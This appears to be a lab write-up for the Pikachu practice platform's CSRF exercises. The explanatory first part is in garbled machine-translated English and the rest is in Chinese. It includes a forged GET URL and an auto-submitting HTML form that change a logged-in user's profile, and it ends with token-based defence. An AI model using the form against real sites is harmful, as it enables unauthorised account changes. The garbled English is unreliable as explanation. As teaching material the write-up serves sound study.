Overview:
CSRF (cross-site request forgery) Overview of Cross-site request forgery referred to as "CSRF", the CSRF attack scenario an attacker can fake a request (this request is usually a link), and fool the target user to click, once the user clicks this request, the entire attack is complete. So CSRF attacks become "one click" attack. A lot of people do not know the concept of CSRF, and XSS and sometimes it will be confused or, worse, it will be ultra vires and confuse the issue, this is not clear due to the principle.
Here are a scene to explain, hoping to help you understand.
Scene demand:
black on white you want to modify fill in the membership shopping site tianxiewww.xx.com address.
Under white look is how to modify their own password:
Log --- modify membership information, submit a request --- modified successfully.
So you want to modify information black white, he needs to have: 1, 2 login permissions, modification request personal information.
But do not put myself in white xxx website account password to tell black, black how to do that?
So he went to register an account on its own www.xx.com, then modify your own personal information (such as: E-mail address), he found that the modified request is:
[http://www.xxx .com / edit.php [email protected]&Change=Change]?
so he carried out such an operation: this link camouflage look after login white xxx site, click deceive him, white click on this link after, personal information is modified, the purpose of the attack is complete black.
Why black action can achieve it. There are several key points:
1.www.xxx.com check this site is not excessive when users modify personal information, leading to the request easily forged;
--- Therefore, we determine whether there is a website CSRF vulnerability, in fact, to judge its operation on critical information (such as passwords and other sensitive information) (additions and deletions) whether easily forged.
2. White clicked on the link sent in black and white this time, just to log in shopping online;
--- if white safety awareness high, do not click on unknown links, the attack will not be successful, or even white click on the link, but this time did not sign in white shopping site, will not succeed.
--- Therefore, to successfully implement a CSRF attack, we need to "climate, geography, and" conditions.
Of course, if the black front page xxx advance if the network finds a XSS vulnerability, the black might do: cheat White visited ambush XSS script (to steal cookie script) pages, white strokes, small black and white to get the cookie, and then successfully log on to the black background of white, black white amend their own relevant information.
--- so than with the above look, you can see the difference of CSRF and XSS: CSRF is completed by the user's privileges attack, the attacker did not get the user's permission, and steal XSS directly to the user's permission, and then do harm. So, if you want to prevent CSRF attack site, you need to implement the operation of sensitive information corresponding security measures to prevent these situations that appear to be forged, leading to CSRF. For example:
- token sensitive information increases safety of operation;
- the operation of increasing the security of sensitive information codes;
- a logic flow of sensitive information safe operation of embodiment, such as when to change the password, you need to check old password.
1.CSRF(get)
First, just landing an account:
Try to modify my personal information and submit, while taking advantage of BurpSuite Ethereal View profile modification request content
From the point of view of the submission of the request is to modify the information submitted by GET requests, we get this, change it, and then let lucy click like, we construct the URL in the address changed to add ppsuc. lucy Click on a modified address
test.com:8081/pikachu-master/vul/csrf/csrfget/csrf_get_edit.php?sex=girl&phonenum=12345678922&add=ppsuc&email=lucy%40pikachu.com&submit=submit
results confirm the success has been modified:
2.CSRF(POST)
If POST type, all arguments submitted in the request body, we were attacked not by way of fake URL
It is necessary to construct a link that file to your own server, a function is accessed automatically post data to modify personal data PHP file.
So to construct html
<html>
<head>
<script>
window.onload = function() {
document.getElementById("postsubmit").click();
}
</script>
</head>
<body>
<form method="post" action="http://test.com:8081/pikachu-master/vul/csrf/csrfpost/csrf_post_edit.php">
<input id="sex" type="text" name="sex" value="girl" />
<input id="phonenum" type="text" name="phonenum" value="12345678922" />
<input id="add" type="text" name="add" value="ppsuc" />
<input id="email" type="text" name="email" value="[email protected]" />
<input id="postsubmit" type="submit" name="submit" value="submit" />
</form>
</body>
</html>
此html在刚加载时就会触发id为postsubmit的对象,导致构造的form表单的数据被提交,而我们构造表单的vaule为我们想要的数据,这样就可以导致csrf产生。
接下来进行测试:
在已经登陆lucy的情况下,点击url:http://test.com:8081/pikachu-master/vul/csrf/csrfpost/post.html
首先会跳转,接着修改信息成功
3.CSRF TOKEN
CSRF的主要问题是敏感操作容易被伪造,我们可以加入Token让请求不容易被伪造
每次请求,都增加一个随机码,后台每次对这个随机码进行验证
进入Pikachu平台的CSRF(token)页面并登录,可以看一下这个GET请求
这里token是随机生成的,目前没有办法伪造URL了。